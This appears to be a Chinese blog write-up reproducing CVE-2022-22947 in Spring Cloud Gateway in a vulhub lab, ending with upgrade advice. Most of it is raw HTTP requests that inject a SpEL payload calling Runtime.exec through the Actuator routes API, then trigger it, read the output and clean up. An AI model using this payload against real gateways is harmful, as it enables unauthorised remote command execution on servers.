Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
漏洞描述Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。影响版本3.1.03.0.0至3.0.6漏洞环境git clone https://github.com/vu
漏洞描述
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。当攻击者可以访问Actuator API
的情况下,将可以利用该漏洞执行任意命令。
影响版本
3.1.0
3.0.0至3.0.6
漏洞环境
git clone https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/docker-compose.yml
docker-compose up -d
访问ip:8080出现以下界面说明搭建成功
漏洞复现
1.添加包含恶意的路由
POST /actuator/gateway/routes/blue HTTP/1.1
Host: 192.168.1.41:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 0{
"id": "blue",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
2.看到以上数据包说明新增路由创建成功。
再次发送如下数据包,应用刚才添加的路由,触发SpEL
表达式执行:
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.1.41:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
3.命令执行成功
GET /actuator/gateway/routes/blue HTTP/1.1
Host: 192.168.1.41:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
4.删除添加的恶意路由
DELETE /actuator/gateway/routes/blue HTTP/1.1
Host: 192.168.1.41:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 325
修复方案
3.1.x用户应升级到3.1.1+
3.0.x用户应升级到3.0.7+
更多推荐
所有评论(0)